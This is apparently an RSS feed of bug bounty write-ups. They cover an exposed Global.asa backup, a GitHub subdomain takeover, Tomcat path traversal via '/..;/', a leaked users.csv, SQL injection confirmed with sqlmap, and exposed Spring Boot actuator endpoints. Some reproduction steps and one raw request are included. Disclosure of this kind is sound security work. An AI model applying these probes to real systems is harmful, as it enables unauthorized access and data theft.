<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: João Victor</title>
    <description>The latest articles on DEV Community by João Victor (@c4ng4c31r0).</description>
    <link>https://dev.to/c4ng4c31r0</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1576482%2F3b45567a-ac1c-4833-80d1-64fd76e65dcd.jpg</url>
      <title>DEV Community: João Victor</title>
      <link>https://dev.to/c4ng4c31r0</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/c4ng4c31r0"/>
    <language>en</language>
    <item>
      <title>Global.asa backup file found</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Fri, 13 Jun 2025 15:38:02 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/globalasa-backup-file-found-3ad0</link>
      <guid>https://dev.to/c4ng4c31r0/globalasa-backup-file-found-3ad0</guid>
      <description>&lt;h1&gt;
  
  
  &lt;strong&gt;Reward : $2500&lt;/strong&gt;
&lt;/h1&gt;

&lt;h1&gt;
  
  
  Overview of the Vulnerability
&lt;/h1&gt;

&lt;p&gt;A &lt;strong&gt;backup copy of the &lt;code&gt;Global.asa&lt;/code&gt; file&lt;/strong&gt; was found publicly accessible on the web server. This file is commonly used in classic ASP applications and may contain &lt;strong&gt;sensitive information&lt;/strong&gt;, such as database connection strings, file paths, application-level settings, or authentication logic. If exposed, it can assist an attacker in gaining deeper access to the application or underlying infrastructure.&lt;/p&gt;

&lt;h1&gt;
  
  
  Steps to Reproduce
&lt;/h1&gt;

&lt;p&gt;During a fuzzing process using the wordlist available at:&lt;br&gt;
&lt;code&gt;https://raw.githubusercontent.com/onvio/wordlists/master/words_and_files_top5000.txt&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;we discovered the following publicly accessible backup file:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;https://cangacei[.]ro/Global.asa.bak&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This file was successfully downloaded and, upon inspection, it was found to contain plaintext credentials along with instructions pointing to another directory within the application. By following this path, we were able to access additional sensitive information, including:&lt;br&gt;
Details from other customers&lt;br&gt;
Internal support tickets and communication&lt;br&gt;
Application-specific configuration data&lt;/p&gt;

&lt;p&gt;This exposure represents a significant security risk, as it provides direct access to internal application logic, user data, and potentially database systems.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fshs75ha9jx68ph56dzku.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fshs75ha9jx68ph56dzku.png" alt="Image description" width="800" height="744"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5snhd84hvej4vb7zfq6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff5snhd84hvej4vb7zfq6.png" alt="Image description" width="499" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhwmumcsbhbscnb6vpf6f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhwmumcsbhbscnb6vpf6f.png" alt="Image description" width="735" height="826"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15rpni5z63kogfoovzyl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15rpni5z63kogfoovzyl.png" alt="Image description" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Github subdomain takeover</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Wed, 29 Jan 2025 21:08:33 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/github-subdomain-takeover-3j6k</link>
      <guid>https://dev.to/c4ng4c31r0/github-subdomain-takeover-3j6k</guid>
      <description>&lt;p&gt;&lt;br&gt;
&lt;code&gt;reward: 200$&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;h1&gt;
  
  
  Description
&lt;/h1&gt;

&lt;p&gt;A subdomain takeover is when a misconfigured Domain Name System (DNS) record is re-registered to an endpoint owned by an attacker. An attacker is then able to redirect users to the endpoint and capture data such as cookies and credentials, perform Cross-Site Scripting (XSS) attacks, and potentially take over accounts in the legitimate application.&lt;/p&gt;

&lt;p&gt;A subdomain takeover vulnerability was identified which could impact the reputation and brand of the business. An attacker can register a subdomain on behalf of the target domain and use it for spamming and phishing attacks.&lt;/p&gt;

&lt;h1&gt;
  
  
  Business Impact
&lt;/h1&gt;

&lt;p&gt;Subdomain takeover can lead to data theft and indirect financial loss through the attacker’s ability to interact with legitimate users. These malicious actions could also result in reputational damage for the business through the impact to customers’ trust.&lt;/p&gt;

&lt;h1&gt;
  
  
  Steps to Reproduce
&lt;/h1&gt;

&lt;ol&gt;
&lt;li&gt;Go to new repository page&lt;/li&gt;
&lt;li&gt;Set Repository name to canonical domain name (i.e., {something}.github.io from CNAME record)&lt;/li&gt;
&lt;li&gt;Click Create repository&lt;/li&gt;
&lt;li&gt;Push content using git to a newly created repo. GitHub itself provides the steps to achieve it&lt;/li&gt;
&lt;li&gt;Switch to Settings tab&lt;/li&gt;
&lt;li&gt;In GitHub Pages section choose master branch as source&lt;/li&gt;
&lt;li&gt;Click Save&lt;/li&gt;
&lt;li&gt;After saving, set Custom domain to source domain name (i.e., the domain name which you want to take over)&lt;/li&gt;
&lt;li&gt;Click Save&lt;/li&gt;
&lt;/ol&gt;

&lt;h1&gt;
  
  
  PoC
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmbcqaaw8od2vo2c55vj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmbcqaaw8od2vo2c55vj.png" alt="Image description" width="800" height="660"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4cqo6bn5fj7eaxcml9it.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4cqo6bn5fj7eaxcml9it.png" alt="Image description" width="800" height="675"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6vmzc5na5m5d95pwvsh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa6vmzc5na5m5d95pwvsh.png" alt="Image description" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Status
&lt;/h1&gt;

&lt;p&gt;Resolved&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Path traversal via reverse proxy mapping</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Thu, 19 Dec 2024 16:04:05 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/path-traversal-via-reverse-proxy-mapping-n1a</link>
      <guid>https://dev.to/c4ng4c31r0/path-traversal-via-reverse-proxy-mapping-n1a</guid>
      <description>&lt;p&gt;Reward $100&lt;/p&gt;

&lt;h1&gt;
  
  
  &lt;strong&gt;Overview of the Vulnerability&lt;/strong&gt;
&lt;/h1&gt;

&lt;p&gt;Path traversal uses a server misconfiguration to access hidden files and directories that are stored on the served web application. This can include sensitive operating files, code and data that runs the application, or in some cases, user credentials.&lt;/p&gt;

&lt;p&gt;An attacker can leverage the path traversal vulnerability in this application to gain access to system files in a folder of a directory that is not intended for public access.&lt;br&gt;
Tomcat will threat the sequence /..;/ as /../ and normalize the path while reverse proxies will not normalize this sequence and send it to Apache Tomcat as it is.&lt;/p&gt;

&lt;p&gt;This allows an attacker to access Apache Tomcat resources that are not normally accessible via the reverse proxy mapping.&lt;/p&gt;
&lt;h1&gt;
  
  
  &lt;strong&gt;Business Impact&lt;/strong&gt;
&lt;/h1&gt;

&lt;p&gt;Path traversal can lead to reputational damage for the business due to a loss in confidence and trust by users. It can also result in data theft and indirect financial losses to the business through the costs of notification and rectifying and breached PII data if an attacker can successfully exfiltrate user data.&lt;br&gt;
An attacker can inject path traversal sequences such as /..;/ and access Apache Tomcat resources that are not normally mapped via the reverse proxy mapping.&lt;/p&gt;
&lt;h1&gt;
  
  
  &lt;strong&gt;Steps to Reproduce&lt;/strong&gt;
&lt;/h1&gt;

&lt;p&gt;Reply this request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;GET /axis2//..;/ HTTP/1.1
Cookie: JSESSIONID=35287FC413AC61BB9B76A853DBAF0DC7; sftlc=O3BU01JCA7NJ1P9527N7QX3JBS81K7I8; JSESSIONID=A80093E984D73E98210B41D334FE50C8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: c4ng4c31r0.com
Connection: Keep-alive
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  PoC:
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4efhdecajq08s1khcz7e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4efhdecajq08s1khcz7e.png" alt="Image description" width="800" height="444"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayn8itk4dusxr1bj6uk2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fayn8itk4dusxr1bj6uk2.png" alt="Image description" width="800" height="297"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;PS: The triage changed the severity to P1 (critical), but the company changed it to P4 (low), claiming it was a "WAF misconfiguration".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnmg8vdjz0msm9buyj1d7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnmg8vdjz0msm9buyj1d7.png" alt="Image description" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7o9px454fw5fu2jmip18.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7o9px454fw5fu2jmip18.png" alt="Image description" width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Status: Resolved&lt;br&gt;
Reward: 100$&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Massive users data exposure</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Thu, 27 Jun 2024 20:01:56 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/massive-users-data-exposure-51f4</link>
      <guid>https://dev.to/c4ng4c31r0/massive-users-data-exposure-51f4</guid>
      <description>&lt;p&gt;&lt;strong&gt;Reward $1500&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overview of the Vulnerability&lt;/strong&gt;&lt;br&gt;
Sensitive data exposure can occur when sensitive data is not encrypted, or behind an authorization barrier. When this information is exposed it can place sensitive data, such as secrets, at risk. This can occur due to a variety of scenarios such as not encrypting data, SSL not being used for authenticated pages, or passwords being stored using unsalted hashes. Examples of such data include, but are not limited to: personally identifiable information (PII), Social Security numbers, medical data, banking information, and login credentials.&lt;/p&gt;

&lt;p&gt;Sensitive data relating to the business was exposed. This data could be exfiltrated and used by an attacker to sell access to databases and database content, or use credentials identified to take over accounts, amongst other attack vectors.&lt;/p&gt;

&lt;p&gt;When performing an analysis at the root of the application, it was possible to find a file "users.csv", which contains information on 5412 users.&lt;br&gt;
The information is: ID, Username, Title, First name, Last name, email, and status (active or inactive).&lt;br&gt;
Information like this is very important, particularly for phishing attacks and social engineering as a whole.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Steps to Reproduce&lt;/strong&gt;&lt;br&gt;
Access the url below and it will perform an automatic download of the mentioned file:&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/users.csv"&gt;https://c4ng4c31r0[.]com/users.csv&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/users.xlsx"&gt;https://c4ng4c31r0[.]com/users.xlsx&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proof of Concept (PoC)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpliroy9rb969jhsbhgfq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpliroy9rb969jhsbhgfq.png" alt="Image description" width="800" height="228"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2tculskznrevr63cwzt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2tculskznrevr63cwzt.png" alt="Image description" width="800" height="104"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Status:&lt;/strong&gt;&lt;br&gt;
Resolved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reward:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9y736wuux3we66fkbqh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9y736wuux3we66fkbqh.png" alt="Image description" width="800" height="280"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Authenticated SQL Injection</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Thu, 13 Jun 2024 13:21:28 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/authenticated-sql-injection-5o0</link>
      <guid>https://dev.to/c4ng4c31r0/authenticated-sql-injection-5o0</guid>
      <description>&lt;p&gt;Reward: $300&lt;br&gt;
Program: Private&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;br&gt;
SQL injection (SQLi) is a vulnerability in which an application accepts input into an SQL statement and treats this input as part of the statement. Typically, SQLi allows a malicious attacker to view, modify or delete data that should not be able to be retrieved. An SQLi vulnerability was found for this host which allows an attacker to execute code and view data from the SQL service by submitting SQL queries.&lt;/p&gt;

&lt;p&gt;An attacker could exploit this lack of input sanitization to exfiltrate database data and files, tamper with the data, or perform resource exhaustion. Depending on the database and how it is configured, an attacker could potentially remotely execute code on the server running the database.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;&lt;br&gt;
Data exfiltration through a SQLi attack could lead to reputational damage or regulatory fines for the business due to an attacker’s unauthorized access to data. This could also result in reputational damage for the business through the impact to customers’ trust. The severity of the impact to the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PoC&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Click on "view" and then on the highlighted download icon, right click and click on "copy url"&lt;br&gt;
&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw6r0jrhxr0fm6j0bq83e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw6r0jrhxr0fm6j0bq83e.png" alt="Image description" width="800" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Modify param "pcrc" to add single quote and view error which states 'SQL Syntax Error' at &lt;a href="https://site.com/web_gtr/download.php?opc=1&amp;amp;anio=XXX&amp;amp;familia=XXX&amp;amp;pcrc=c4ng4c31r0"&gt;https://site.com/web_gtr/download.php?opc=1&amp;amp;anio=XXX&amp;amp;familia=XXX&amp;amp;pcrc=c4ng4c31r0&lt;/a&gt;'&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kbl4fdcf55h6izfmbgd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kbl4fdcf55h6izfmbgd.png" alt="Image description" width="800" height="103"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;to explore quickly and automatically, the sqlmap tool was used.&lt;br&gt;
To replicate, we save the request intercepted by burp suite in a file and use it as a basis for making requests.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1rpwctqgrhe1n9z83xed.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1rpwctqgrhe1n9z83xed.png" alt="Image description" width="800" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F70ygz2poqp48r0uuylps.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F70ygz2poqp48r0uuylps.png" alt="Image description" width="800" height="187"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft5axd8b876scfyta9lva.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft5axd8b876scfyta9lva.png" alt="Image description" width="800" height="161"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Reward/Status:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbl6c3a6ckxckbidmqwvb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbl6c3a6ckxckbidmqwvb.png" alt="Image description" width="473" height="297"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Sensitive Information disclosure via Spring Boot Default Paths</title>
      <dc:creator>João Victor</dc:creator>
      <pubDate>Fri, 07 Jun 2024 20:57:22 +0000</pubDate>
      <link>https://dev.to/c4ng4c31r0/sensitive-information-disclosure-via-spring-boot-default-paths-h78</link>
      <guid>https://dev.to/c4ng4c31r0/sensitive-information-disclosure-via-spring-boot-default-paths-h78</guid>
      <description>&lt;p&gt;Reward: $250&lt;br&gt;
Program: Private&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overview of the Vulnerability&lt;/strong&gt;&lt;br&gt;
Disclosure of secrets for a publicly available asset occurs when sensitive data is not behind an authorization barrier. When this information is exposed it can place sensitive data, such as secrets, at risk. This can occur due to a variety of scenarios such as not encrypting data, secrets committed to GitHub within public repositories, or exposed external assets. Disclosure of secrets for publicly available assets could be leveraged by an attacker to gain privileged access to the application or the environment where the application is hosted. From here, an attacker could execute functions under the guise of an Administrator user, depending on the permissions level they are able to access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Business Impact&lt;/strong&gt;&lt;br&gt;
Disclosure of secrets for a publicly available asset can lead to indirect financial loss due to an attacker accessing, deleting, or modifying data from within the application. Reputational damage for the business can also occur via the impact to customers’ trust that these events create. The severity of the impact to the business is dependent on the sensitivity of the data being stored in, and transmitted by the application.&lt;/p&gt;

&lt;p&gt;Spring Boot Paths are exposing critical information about c4ng4c31r0[.]com such as paths, environment configuration.&lt;br&gt;
Spring Boot paths found:&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/heapdump"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/heapdump&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/beans"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/beans&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/caches"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/caches&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/conditions"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/conditions&lt;/a&gt;&lt;br&gt;
ttps://c4ng4c31r0[.]com/api/maintenance/actuator/configprops&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env/home"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env/home&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env/lang"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env/lang&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env/language"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env/language&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env/path"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env/path&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/env/hostname"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/env/hostname&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/features"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/features&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/health"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/health&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/info"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/info&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/mappings"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/mappings&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/metrics"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/metrics&lt;/a&gt;&lt;br&gt;
&lt;a href="https://c4ng4c31r0%5B.%5Dcom/api/maintenance/actuator/loggers"&gt;https://c4ng4c31r0[.]com/api/maintenance/actuator/loggers&lt;/a&gt;&lt;br&gt;
